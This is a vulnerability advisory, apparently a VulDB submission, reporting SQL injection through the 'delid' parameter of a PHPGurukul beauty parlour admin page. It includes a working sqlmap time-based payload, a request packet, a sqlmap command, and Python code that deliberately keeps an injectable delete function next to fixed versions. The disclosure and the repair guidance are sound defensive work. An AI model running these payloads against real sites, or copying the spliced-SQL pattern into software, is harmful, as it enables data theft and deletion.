Submit #665594: PHPGurukul Beauty Parlour Management System V1.1 SQL Injection

Title: PHPGurukul Beauty Parlour Management System V1.1 SQL Injection
Description:

## NAME OF AFFECTED PRODUCT(S)
- Beauty Parlour Management System

## Vendor Homepage
- https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/

## AFFECTED AND/OR FIXED VERSION(S)

### Submitter
- Li Hu - [email protected] - School of Cyberscience, University of Science and Technology of China

### Vulnerable File
- /admin/customer-list.php

### VERSION(S)
- V1.1

### Software Link
- https://phpgurukul.com/?sdm_process_download=1&download_id=10611

## PROBLEM TYPE

### Vulnerability Type
- SQL injection

### Root Cause
- A SQL injection vulnerability exists in the "/admin/customer-list.php" file of the "Beauty Parlour Management System" project. The value of the "delid" GET parameter is placed directly into a SQL query without validation, escaping or parameter binding, so an attacker who controls that value controls part of the query text and can change what the statement does.

### Impact
- Exploiting this SQL injection vulnerability lets an attacker read, modify or delete database contents, leak sensitive customer data and, depending on the privileges of the database account, gain further control over the system or disrupt service. This is a severe threat to both the security of the system and the continuity of business operations.

## DESCRIPTION
- During a security assessment of "Beauty Parlour Management System", I identified a critical SQL injection vulnerability in the "/admin/customer-list.php" file, caused by insufficient validation of the "delid" parameter. An attacker can inject SQL through this parameter and thereby access the database without authorization, modify or delete data, and obtain sensitive information. Immediate corrective action is needed to safeguard system security and data integrity.

## No login or authorization is required to exploit this vulnerability

Note that the request packet below carries a PHPSESSID cookie and the file sits under /admin/; anyone reproducing the finding should confirm the time delay in a fresh session with no admin login.

## Vulnerability details and POC

### Vulnerability location:
- "delid" parameter

### Payload:
```bash
Parameter: delid (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)
Payload: delid=10' RLIKE (SELECT 2249 FROM (SELECT(SLEEP(5)))pzgV)-- tkhW
```

### Vulnerability Request Packet
```txt
GET /1/bpms/admin/customer-list.php?delid=10 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=n11ldb2a9k2k7539qsd6c5usit
Upgrade-Insecure-Requests: 1
Priority: u=0, i
```

### The finding was confirmed with sqlmap, run against the saved request packet above:
```bash
python sqlmap.py -r payload.txt --batch --level 3
```

Screenshot of the sqlmap output: https://github.com/user-attachments/assets/84afbd4b-170e-48ff-a8e7-c904ec43772a

## Suggested repair

1. **Employ prepared statements and parameter binding:** Prepared statements are an effective safeguard against SQL injection because they separate the SQL text from user-supplied data. With a prepared statement, a user-entered value is sent to the database as data and is never parsed as SQL code.
2. **Conduct input validation and filtering:** Rigorously validate user input to ensure it matches the expected format. "delid" identifies a row, so it should only ever be accepted as an integer; anything else should be rejected before a query is built.
3. **Minimize database user permissions:** Ensure that the account the application uses to connect to the database has only the minimum required permissions. Avoid using accounts with elevated privileges (such as 'root' or 'admin') for day-to-day operations, so that a successful injection cannot reach beyond the application's own tables.
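The vulnerable pattern described in the root cause, beside the repair recommended in items 1 and 2, as an added example that is not code from the PHPGurukul project. The handler is modelled in Python on an in-memory SQLite table so it runs offline; the table name `tblcustomer`, its columns and the sample rows are assumptions, not taken from the project. The sqlmap payload quoted above is reused only as a bound parameter, since SQLite has no RLIKE or SLEEP.

```python
import re
import sqlite3

# Constructed sample data (assumption: the real project's table name and
# columns are not known from the advisory).
SAMPLE_ROWS = [(10, "Alice"), (11, "Bob"), (12, "Carol")]

# The sqlmap payload quoted in the advisory, used below only as an inert
# bound parameter; it is never spliced into SQL text here.
SQLMAP_PAYLOAD = "10' RLIKE (SELECT 2249 FROM (SELECT(SLEEP(5)))pzgV)-- tkhW"


def fresh_db():
    """Return a new in-memory database holding three customer rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tblcustomer (ID INTEGER PRIMARY KEY, Name TEXT)")
    conn.executemany("INSERT INTO tblcustomer VALUES (?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def remaining(conn):
    """Number of customer rows still present."""
    return conn.execute("SELECT COUNT(*) FROM tblcustomer").fetchone()[0]


def delete_customer_unsafe(conn, delid):
    """The vulnerable pattern: the GET parameter is spliced into the SQL text.

    A value such as 10' OR '1'='1 turns the statement into
    DELETE FROM tblcustomer WHERE ID='10' OR '1'='1', which deletes every row.
    Returns the number of rows left afterwards.
    """
    sql = "DELETE FROM tblcustomer WHERE ID='" + delid + "'"
    conn.execute(sql)
    conn.commit()
    return remaining(conn)


def delete_customer_bound_only(conn, delid):
    """Repair item 1 alone: parameter binding, no validation.

    The value reaches the engine as data and is never parsed as SQL, so the
    sqlmap payload simply matches no row. Returns the number of rows deleted.
    """
    cur = conn.execute("DELETE FROM tblcustomer WHERE ID=?", (delid,))
    conn.commit()
    return cur.rowcount


# delid is a row id: accept only a short positive decimal integer.
DELID_RE = re.compile(r"[1-9][0-9]{0,9}")


def delete_customer_safe(conn, delid):
    """Repair items 1 and 2 together: validate the shape, then bind.

    Anything that is not a plain positive integer is rejected before any SQL
    runs, and the accepted value is still bound rather than spliced.
    Returns the number of rows deleted.
    """
    if not isinstance(delid, str) or not DELID_RE.fullmatch(delid):
        raise ValueError("delid must be a positive integer")
    cur = conn.execute("DELETE FROM tblcustomer WHERE ID=?", (int(delid),))
    conn.commit()
    return cur.rowcount


if __name__ == "__main__":
    print("unsafe, delid=10            -> rows left:", delete_customer_unsafe(fresh_db(), "10"))
    print("unsafe, delid=10' OR '1'='1 -> rows left:", delete_customer_unsafe(fresh_db(), "10' OR '1'='1"))
    print("bound only, sqlmap payload  -> rows deleted:", delete_customer_bound_only(fresh_db(), SQLMAP_PAYLOAD))
    print("safe, delid=10              -> rows deleted:", delete_customer_safe(fresh_db(), "10"))
    try:
        delete_customer_safe(fresh_db(), "10' OR '1'='1")
    except ValueError as exc:
        print("safe, injected delid        -> rejected:", exc)
```

Binding alone already makes the quoted payload inert, but the integer check in `delete_customer_safe` is still worth having: it rejects malformed requests before a database round trip and keeps a bound string from being silently compared against a numeric key.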
Source: https://github.com/f000x0/cve/issues/3
User: Li Hu (UID 89284)
Submission: 09/30/2025 09:34 (7 months ago)
Moderation: 10/07/2025 12:54 (7 days later)
Status: Accepted
VulDB entry: 327351 [PHPGurukul Beauty Parlour Management System 1.1 /admin/customer-list.php delid sql injection]
Points: 20
